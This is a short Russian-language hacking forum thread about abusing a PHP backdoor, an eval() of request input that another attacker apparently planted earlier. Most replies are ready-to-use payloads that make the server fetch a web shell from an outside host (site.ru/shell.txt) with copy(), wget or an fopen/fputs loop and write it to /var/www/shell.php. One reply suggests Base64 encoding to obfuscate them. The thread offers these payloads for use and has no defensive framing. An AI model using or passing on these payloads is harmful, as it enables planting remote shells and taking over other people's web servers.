![]() |
Есть одна уязвимость, точнее Бэкдор в одном скрипте
PHP код:
|
Пока ждал ответа мысль сама пришла в голову
Если кому интересно, то вот мой вариант index.php?q=$_GET[q2]=stripslashes($_GET[q2]);eval($_GET[q2]);&q2=copy("http://site.ru/shell.txt","shell.php"); |
Код:
Код:
Код:
cmd=copy('http://site.ru/shell.txt','/var/www/shell.php');Код:
Код:
cmd=copy($_REQUEST[a],$_REQUEST[b]);&a=http://site.ru/shell.txt&b=/var/www/shell.phpКод:
Код:
cmd=wget http://site.ru/shell.txt -O /var/www/shell.phpКод:
eval($_REQUEST[cmd]);Код:
cmd=$a=fopen($_REQUEST[b],$_REQUEST[bb]);$b=fopen($_REQUEST[c],$_REQUEST[cc]);while(!feof($a)){$res=fgets($a);fputs($b,$res);}&bb=b&cc=w+&b=http://site.ru/shell.txt&c=/var/www/shell.php |
Я бы ваапще использовал Base64.
|
Redwood, видимо, он править не имеет возможности скрипт, поэтому юзать только может eval ($_GET['q']); (то, что какой-то хацкер прописал до него)
|
| Время: 13:49 |